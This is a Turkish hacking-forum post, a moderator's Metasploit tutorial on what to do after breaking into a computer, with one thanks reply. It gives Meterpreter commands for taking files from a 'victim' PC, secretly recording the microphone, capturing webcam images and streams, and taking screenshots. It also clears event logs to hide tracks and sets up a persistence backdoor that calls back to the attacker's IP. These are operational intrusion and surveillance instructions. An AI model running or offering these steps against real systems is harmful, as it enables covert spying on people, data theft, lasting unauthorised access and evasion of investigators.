İPUCU

Siber Güvenlik Siber Güvenlik ile alakalı araçların kullanımı, bilgi paylaşımı ve siber güvenlik eğitimi ile ilgili kaynakların paylaşıldığı alanımızdır.

Seçenekler

[Metαsploit Serisi] Exploit Sonrası İşlemler ~Ceys~

Ceys - ait Kullanıcı Resmi (Avatar)
Süper Moderatör
Üyelik tarihi:
04/2016
Mesajlar:
7.026
Konular:
690
Teşekkür (Etti):
144
Teşekkür (Aldı):
3119
Ticaret:
(0) %
16-03-2018 18:58
#1
[Metαsploit Serisi] Exploit Sonrası İşlemler ~Ceys~


Merhaba arkadaşlar Metαsploit'in son konusu olan exploitten sonra yapılacak olanları anlatacağım.
tabiki bundan önceki konularımızda bir sunucuya nasıl sızıldığını göstermiştik. o konuları kullanarak sızma eylemini gerçekleştirdikten sonra bunları yapmalısınız.
Şimdi başlık başlık inceleme yapalım.

Dosya İndirme

Sızılan bir PCden dosya alma komutumuz.

Öncelikle herhengi bir konuma gidin..

Alıntı:
C:\Users\PC\Desktop
Daha sonra indireceğiniz dosyayı;

Alıntı:
download -r dosyadı.uzantı /nereye kayıt edileceği/Hangi isimle kayıt edileceği
şeklinde komut verince dosya göstermiş olduğumuz konuma inecektir.



Dosya Yükleme

Sızdığınız herhengi bir PCye kendi bilgisayarınızdan bir dosya upload etmek istiyorsanız şu komutu girmelisiniz.

Alıntı:
upload -r /dosyanın bulunduğu konum/dosya_adı/dosyanın yükleneceği konum/kayıt edilecek isim


şeklinde yükleme yaparsanız vermiş olduğunuz konuma dosya upload olacaktır.

Ekran Görüntüsü Alma

Ekran görüntüsü almak istiyorsak konsola direk;

Alıntı:
screenshot
komutunu yazarız.



belirtilen klasöre default bir isimle kayıt olur.



Alıntı:
screenshot -h
yazarak özel parametreleri listeleyebiliriz.



Burda -p parametresini kullanarak dosyayı özel olarak kendi belirlediğimiz yere kayıt edebiliriz.

Alıntı:
screenshot -p /komun/dosyaadı ve uzantısı


Ses Kaydı Alma

Bir Pcde ses kaydı almak istediğimizde

Alıntı:
record_mic
komutunu kullanarak ses kaydını default olarak alabiliriz.
bu yine default olarak root klasörüne kayıt olur.
tabi bu kaydı alabilmek için kurban mikrofonu kullanıyor olması gerek.
kayıt siz durdurana kadar devam eder. CTRL+C tuşu ile kaydı durdurabilirsiniz.



Yine aynı şekilde

Alıntı:
record_mic -h
komutunu kullanarak parametreleri listeleyebilirsiniz.
parametrelerin kullanım amacı yanlarında yazıyor.
-p ile istediğiniz gibi kayıt sağlayabilirsiniz.



İzleri Kaybetme

izleri kaybetmek için konsola 2 komut girmemiz gerekiyor. Bunlar:

Alıntı:
clearev


run event_manager -c


bu 2 komutu kullanarak izlerimizi tam olarak silemesekte göz önünden kaldırmış oluyoruz.

WebCam Görüntüsü Alma

Webcam görüntüsü almak için konsola;

Alıntı:
webcam_
yazıp TAB tuşuna bastığınızda alt tarafta 4 seçenek çıkacaktır.

webcam_chat : karşılıklı olarak kameraları başlatır ve chat yaparsınız.
webcam_list : kurulu olan kameraları listeler.
webcam_snap : Kurulu kameralardan ekran görüntüsü almak için kullanılır.
webcam_stream : PCden direk videolu kayıt yapar ama kayıt etmez sadece pencereden gösterir.



BackDoor Oluşturma

BackDoor hacklenen PCde uzun süre kalmamızı sağlar. Sistem kapansa bile biz arka taraftan yönetim sağlayabiliriz.
Bunun için konsola;

Alıntı:
run persistence -h
yazarak yardım menüsünü açalım.



Burda:

-A : Otomatik bağlanma.
-L : Dosya yolunu belirtir.
-P : payload seçme
-S : sistem yetkisi sağlama
-T : Alternatif exe uygulaması
-U : Kullanıcı seçme
-X : Otomatik arka kapı
-h : yardım menüsü
-i : saniye belitme
-p : ortam belirtme
-r : IP bilgisi

Şimdi komutumuzu yazalım..

Alıntı:
run persistence -A -U PC adı -i 15 -p 6370 -r IP Adresi
şeklinde çalıştıralım..



Bu şekilde yaparsanız siz sistemden çıkış yapsanız bile size tekrar bağlantı şağlayacaktır.
peki biz bunu ne için kullanıyoruz.
eğer sistem bizi bilinmedik bir şekilde atarsa bizim yedirdiğimiz virüs bize tekrar bağlantı sağlasın diye.
yani içerde bi adamımız var artık.

Ola ki biz bağlantıyı kaybettik nasıl bağlanacağız.
öncelikle yedirdiğiniz virüsün bilgilerini bilmek zorundasınız.
onlar bizim için gerekli olduğunu varsayarak devame d,yorum.
tekrardan Metαsploit penceresiniz açın..
ve sırasıyla virüs bilgileriniz girin.



resimde görüldüğü gibi sırayla bilgileri girdiğinizde bize bağlantı sağlayıp işlemlerine devam edecektir.

Bilgisayarımdan kaynaklanan bir sorundan dolayı resimler alıntıdır.



Esen Kalın//Ceys
ATABÖRÜ Teşekkür etti.
ATABÖRÜ - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
07/2017
Nereden:
Ötüken
Yaş:
82
Mesajlar:
3.370
Konular:
303
Teşekkür (Etti):
950
Teşekkür (Aldı):
908
Ticaret:
(0) %
16-03-2018 19:01
#2
Elinize Sağlık.
---------------------
Ey Türk milleti! Kendine dön! Sen yükseltmiş Bilge Kağan'ına, hür ve müstakil ülkene karşı hata ettin, kötü duruma düşürdün. Milletin adı, sanı yok olmasın diye Türk milleti için gece uyumadım, gündüz oturmadım. Kardeşim Kül Tegin ve iki şad ile ölesiye bitesiye çalıştım.

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı